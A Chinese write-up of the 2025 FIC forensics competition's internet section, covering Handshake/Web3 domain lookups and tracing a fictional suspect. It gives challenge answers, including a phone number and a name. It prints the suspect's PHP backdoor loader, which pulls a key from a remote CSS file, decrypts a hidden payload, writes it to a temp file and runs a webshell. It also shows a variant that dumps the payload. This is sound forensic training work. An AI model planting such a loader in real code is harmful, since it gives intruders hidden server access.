Web3
Web3,运行在 区块链技术 上的 去中心化互联网。要准确给出 Web3 是什么网上众说风云,本文从电子数据取证分析视角,借助 2025FIC 竞赛题目,对 Web3 的互联网取证进行一个基本的认识。
Web3 域名
无论是 Web2 还是 Web3,归根到底还是要让用户访问到你的应用,所以会存在域名(Domain Name)。
在 Web2 中,每个域名背后都有一个 IP,Web2 中将域名和 IP 地址进行转换需要通过 DNS 来进行域名解析;
在 Web3 中,区块链钱包地址 通常是一串无规律的长字符,比如 0x220866B1A2219f40e72f5c628B65D54268cA3A9D ,因此 Web3 域名的意义就是要用更简单易记的形式来代替这复杂的地址,一般指那些后缀为 .eth、.bnb、nft、.wallet 等公链缩写或有强 Web3 特征的简称,且应用场景主要在 区块链或 Web3 领域 的域名。
Web3 域名项目
Web3 区块链去中心化域名超全解析 - 知乎
将当前的域名项目划为以下三类:单链域名、多链域名、DNS 替代类域名。其中单链域名又可以进一步细化。
-
单链域名
-
公链域名:以 ENS 为代表,这类项目的辨识度非常高,它们都以公链的简称为后缀,如.eth、.sol、.avax,并且都有公链官方的背景或者官方的明确支持。
-
Web3 域名注册商:以 Unstoppable Domains 为代表。这类项目往往会同时售卖多个后缀的 Web3 域名,且这些域名后缀往往是和 Web3 高度相关的。
-
社交类域名应用:以 Linkkey 为代表,这类项目在域名技术上可能没有特别的创新,但其更侧重于玩法上的创新——将域名与社交应用结合。
-
多链域名
-
NNS、.bit、Space ID,是这一类的主要三个项目。它们在项目的宣传和发展上,都非常强调“ Web3 身份名片”“ Web3 身份管理”这一性质。
-
DNS 代替域名
-
这两个项目的主要愿景,就是作为 Web2 DNS 系统的补充和替代。
-
Handshake 是一个实验性的对等根命名系统,它允许网络参与者共同验证和管理 根 DNS 域名 区域,通俗讲就是自定义后缀
-
通过 Namecoin,用户可以注册和管理.bit 域名
Web3 互联网取证思路
学习自:弘连网络第十五期取证实录---Web3 时代取证
困难的是电子数据取证分析人员无法直接访问到这些域名,只能旁敲侧击。从而延申出两类方法:
-
访问域名
-
寻找域名记录
访问域名进行互联网取证分析
访问域名可以尝试浏览器指向 fingertips,其支持 .bit零网, .eth以太坊网络, HNS网络
https://hnsdns.com:可以在网卡指定 DNS 服务器,来访问 HNS 网络
以寻找域名记录的方式进行互联网取证分析
https://www.namebase.io/:用于 Handshake
https://ens.domains/:用于 ETH 以太坊网络
......
FIC互联网取证部分
1. 请分析检材二,找到李某上游人员陈某博客宣传所用域名为
chen.foren6
这里顶级域名是 foren6,是自定义顶级域名,大概率是 HNS
在 namebase 上搜索该域名,有记录,所以确定为 HNS
NS(Name Server)指定了由哪个名称服务器负责解析属于该域的任何请求
在 namebase 中搜索 NS 的顶级域名 varo,查询到 NS 的 IP 地址 45.79.133.98
用 dig 查询其对应的解析记录
2. 请分析陈某宣传所用域名,该域名的顶级域名在以下那个区块链注册
HNS
3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器(DNS)共有几个
2
4. 请分析陈某宣传所用域名的顶级域名的 NS1 服务器 ip 为
45.79.133.98
5. 请分析陈某宣传所用域名,该域名 DNS 记录指向邮件服务器域名为
mail.163.com
6. 请分析陈某宣传所用域名,该域名的 txt 记录中 chen 的值为
fenbaoliejiu
7. 请分析陈某宣传所用域名,该域名 DNS 记录没有以下那个域名
A admin.chen.foren6;B caidan.chen.foren6;C fichen.foren6;D hl.chen.foren6
该题的选项有问题,这里找到 fic.chen.foren6 是存在 IPv6 的,那么答案应该是 D
8. 请分析陈某宣传所用域名,该博客域名最终 DNS 解析指向的 github 仓库名为
chewhaoN.github.io
9. 请分析陈某 github 账号,陈某对 jkroepke/2Moons 项目增改了几个文件
2
下载原版项目和陈某的项目,在 WinMerge 中比对
增加了文件 encrypted.bin
打开其他被修改过的文本,发现是使用了不同的换行符,忽略差异后重新比较
10. 请分析陈某 github 账号,陈某在修改 2Moons 过程中提到了什么锅底
蜂蜜锅底
$a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();
11. 请分析陈某 github 账号,陈某在游戏 2Moons 中放置的后门连接码的密码为
ficnb
上题的恶意代码生成了yijuhua() ,用Neat Download Manager把css文件下载下来
逆向一下输出yijuhua()
<?php$a=file_get_contents('./蜂蜜锅底.css');$b=md5($a,true);$c=file_get_contents('./encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);echo$i;//$j=sys_get_temp_dir();//$k=$j.'/func_'.uniqid().'.php';//file_put_contents($k,"<?phpn".$i);include $k;//unlink($k);//yijuhua();?>
12. 请访问陈某当前博客,陈某课程的扫码报名地址的域名为
fic.forensix.cn
扫码即可
13. 请分析陈某当前博客,通过互联网找到陈某的旧博客网站标题为
柳如烟大战霸天虎
点击chewhaon.github.io里的“老博客”,已经无法访问了
web.archive.org查旧的网络快照
14. 请分析陈某旧博客,陈某的姓名为
陈浩北
15. 请分析陈某旧博客,陈某的邮箱地址为
查看网页源代码搜@
16. 请分析陈某旧博客,陈某的 11 位手机号为
13170010703
17. 请分析陈某旧博客,陈某最爱的 dota 英雄为
A. 赏金猎人;B. 幻影刺客;C. 斧王;D. 邪影芳灵
D
“圣刀会也没我这么厉害”是dota邪影芳灵的台词
原文始发于微信公众号(格格巫和蓝精灵):Web3互联网取证---2025FIC晋级赛
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论